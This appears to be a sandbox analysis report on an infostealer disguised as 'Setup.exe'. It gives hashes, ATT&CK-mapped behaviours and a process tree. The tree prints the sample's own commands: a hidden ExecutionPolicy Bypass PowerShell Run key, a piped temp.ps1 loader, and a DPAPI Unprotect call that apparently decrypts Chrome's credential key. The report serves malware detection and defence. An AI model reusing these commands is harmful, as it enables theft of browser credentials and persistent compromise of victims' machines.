f03ff5ad41acc12ee8b940934a1341f7bdd98e09eb9a6c92704e2067020f8b41

Analysis

max time kernel
140s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
21/07/2024, 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

37.6MB
MD5

578301380ec4b2da9433e8e9a13e725f
SHA1

abc3b5d3668f7436c60e15abdb10566b25ed2d2b
SHA256

f03ff5ad41acc12ee8b940934a1341f7bdd98e09eb9a6c92704e2067020f8b41
SHA512

b6f893c1fdb1d11bb40429fa554cc8a7f4bd49e5766c3a47a2dcb90e5eec6ba5c71c8cc02466c51f9c6775ce0100788087693649656f6aeaca7a62c5c0e01125
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg896l+ZArYsFRl0PX:R3on1HvSzxAMN8FZArYssPv0q7OZaFN1

Score

8^/10

defense_evasion execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5028	powershell.exe
2328	powershell.exe
1620	powershell.exe
2520	powershell.exe
4796	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
3164	Setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\QVMpJuFULqHDdog.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Setup.exe"	reg.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
1412	cmd.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2212	cmd.exe
4296	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 13 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3568	WMIC.exe
1624	WMIC.exe
3608	WMIC.exe
2028	WMIC.exe
1512	WMIC.exe
2564	WMIC.exe
624	WMIC.exe
2708	WMIC.exe
3548	WMIC.exe
4736	WMIC.exe
624	WMIC.exe
1068	WMIC.exe
1268	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1572	tasklist.exe
4272	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000007b62a5d161dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000206467d161dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000004bce74d261dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005ff57bd261dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001cfee0d161dbda01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c89f62d161dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c4c2c6d161dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d3b194d161dbda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001f0184d161dbda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document"	SearchProtocolHost.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
8	reg.exe
3096	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3824	schtasks.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
2520	powershell.exe
2520	powershell.exe
4312	powershell.exe
4312	powershell.exe
4112	powershell.exe
4112	powershell.exe
1620	powershell.exe
1620	powershell.exe
1620	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
2328	powershell.exe
2328	powershell.exe
2328	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
4848	powershell.exe
4848	powershell.exe
4796	powershell.exe
4796	powershell.exe
4848	powershell.exe
4796	powershell.exe
2500	powershell.exe
2500	powershell.exe
2500	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
3164	Setup.exe
3164	Setup.exe
3164	Setup.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
3520	powershell.exe
3520	powershell.exe
3520	powershell.exe
2772	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	1572	tasklist.exe
Token: SeDebugPrivilege	4272	tasklist.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeIncreaseQuotaPrivilege	68	WMIC.exe
Token: SeSecurityPrivilege	68	WMIC.exe
Token: SeTakeOwnershipPrivilege	68	WMIC.exe
Token: SeLoadDriverPrivilege	68	WMIC.exe
Token: SeSystemProfilePrivilege	68	WMIC.exe
Token: SeSystemtimePrivilege	68	WMIC.exe
Token: SeProfSingleProcessPrivilege	68	WMIC.exe
Token: SeIncBasePriorityPrivilege	68	WMIC.exe
Token: SeCreatePagefilePrivilege	68	WMIC.exe
Token: SeBackupPrivilege	68	WMIC.exe
Token: SeRestorePrivilege	68	WMIC.exe
Token: SeShutdownPrivilege	68	WMIC.exe
Token: SeDebugPrivilege	68	WMIC.exe
Token: SeSystemEnvironmentPrivilege	68	WMIC.exe
Token: SeRemoteShutdownPrivilege	68	WMIC.exe
Token: SeUndockPrivilege	68	WMIC.exe
Token: SeManageVolumePrivilege	68	WMIC.exe
Token: 33	68	WMIC.exe
Token: 34	68	WMIC.exe
Token: 35	68	WMIC.exe
Token: 36	68	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe
Token: 35	2816	WMIC.exe
Token: 36	2816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	68	WMIC.exe
Token: SeSecurityPrivilege	68	WMIC.exe
Token: SeTakeOwnershipPrivilege	68	WMIC.exe
Token: SeLoadDriverPrivilege	68	WMIC.exe
Token: SeSystemProfilePrivilege	68	WMIC.exe
Token: SeSystemtimePrivilege	68	WMIC.exe
Token: SeProfSingleProcessPrivilege	68	WMIC.exe
Token: SeIncBasePriorityPrivilege	68	WMIC.exe
Token: SeCreatePagefilePrivilege	68	WMIC.exe
Token: SeBackupPrivilege	68	WMIC.exe
Token: SeRestorePrivilege	68	WMIC.exe
Token: SeShutdownPrivilege	68	WMIC.exe
Token: SeDebugPrivilege	68	WMIC.exe
Token: SeSystemEnvironmentPrivilege	68	WMIC.exe
Token: SeRemoteShutdownPrivilege	68	WMIC.exe
Token: SeUndockPrivilege	68	WMIC.exe
Token: SeManageVolumePrivilege	68	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3164 wrote to memory of 5092	3164	Setup.exe	88
PID 3164 wrote to memory of 5092	3164	Setup.exe	88
PID 5092 wrote to memory of 1900	5092	cmd.exe	89
PID 5092 wrote to memory of 1900	5092	cmd.exe	89
PID 5092 wrote to memory of 2520	5092	cmd.exe	90
PID 5092 wrote to memory of 2520	5092	cmd.exe	90
PID 2520 wrote to memory of 1436	2520	powershell.exe	93
PID 2520 wrote to memory of 1436	2520	powershell.exe	93
PID 1436 wrote to memory of 3608	1436	csc.exe	94
PID 1436 wrote to memory of 3608	1436	csc.exe	94
PID 3164 wrote to memory of 668	3164	Setup.exe	95
PID 3164 wrote to memory of 668	3164	Setup.exe	95
PID 668 wrote to memory of 4076	668	cmd.exe	96
PID 668 wrote to memory of 4076	668	cmd.exe	96
PID 3164 wrote to memory of 4940	3164	Setup.exe	97
PID 3164 wrote to memory of 4940	3164	Setup.exe	97
PID 4940 wrote to memory of 1572	4940	cmd.exe	98
PID 4940 wrote to memory of 1572	4940	cmd.exe	98
PID 3164 wrote to memory of 1608	3164	Setup.exe	101
PID 3164 wrote to memory of 1608	3164	Setup.exe	101
PID 3164 wrote to memory of 2212	3164	Setup.exe	102
PID 3164 wrote to memory of 2212	3164	Setup.exe	102
PID 1608 wrote to memory of 4272	1608	cmd.exe	103
PID 1608 wrote to memory of 4272	1608	cmd.exe	103
PID 2212 wrote to memory of 4312	2212	cmd.exe	104
PID 2212 wrote to memory of 4312	2212	cmd.exe	104
PID 3164 wrote to memory of 4296	3164	Setup.exe	105
PID 3164 wrote to memory of 4296	3164	Setup.exe	105
PID 4296 wrote to memory of 4112	4296	cmd.exe	106
PID 4296 wrote to memory of 4112	4296	cmd.exe	106
PID 3164 wrote to memory of 4812	3164	Setup.exe	107
PID 3164 wrote to memory of 4812	3164	Setup.exe	107
PID 3164 wrote to memory of 4868	3164	Setup.exe	108
PID 3164 wrote to memory of 4868	3164	Setup.exe	108
PID 3164 wrote to memory of 4908	3164	Setup.exe	109
PID 3164 wrote to memory of 4908	3164	Setup.exe	109
PID 3164 wrote to memory of 1412	3164	Setup.exe	110
PID 3164 wrote to memory of 1412	3164	Setup.exe	110
PID 4812 wrote to memory of 68	4812	cmd.exe	145
PID 4812 wrote to memory of 68	4812	cmd.exe	145
PID 4868 wrote to memory of 1976	4868	cmd.exe	113
PID 4868 wrote to memory of 1976	4868	cmd.exe	113
PID 4908 wrote to memory of 3824	4908	cmd.exe	112
PID 4908 wrote to memory of 3824	4908	cmd.exe	112
PID 3164 wrote to memory of 4100	3164	Setup.exe	146
PID 3164 wrote to memory of 4100	3164	Setup.exe	146
PID 1412 wrote to memory of 1620	1412	cmd.exe	115
PID 1412 wrote to memory of 1620	1412	cmd.exe	115
PID 4100 wrote to memory of 2816	4100	cmd.exe	116
PID 4100 wrote to memory of 2816	4100	cmd.exe	116
PID 3164 wrote to memory of 516	3164	Setup.exe	117
PID 3164 wrote to memory of 516	3164	Setup.exe	117
PID 516 wrote to memory of 4180	516	cmd.exe	118
PID 516 wrote to memory of 4180	516	cmd.exe	118
PID 3164 wrote to memory of 4504	3164	Setup.exe	119
PID 3164 wrote to memory of 4504	3164	Setup.exe	119
PID 4504 wrote to memory of 2348	4504	cmd.exe	120
PID 4504 wrote to memory of 2348	4504	cmd.exe	120
PID 3164 wrote to memory of 4900	3164	Setup.exe	121
PID 3164 wrote to memory of 4900	3164	Setup.exe	121
PID 4900 wrote to memory of 3808	4900	cmd.exe	122
PID 4900 wrote to memory of 3808	4900	cmd.exe	122
PID 4900 wrote to memory of 4148	4900	cmd.exe	123
PID 4900 wrote to memory of 4148	4900	cmd.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:1900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1436
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9347.tmp" "c:\Users\Admin\AppData\Local\Temp\pft4ryoz\CSC99EC05581CD945618B9E5F1369787A6B.TMP"
        5⤵
        
        PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
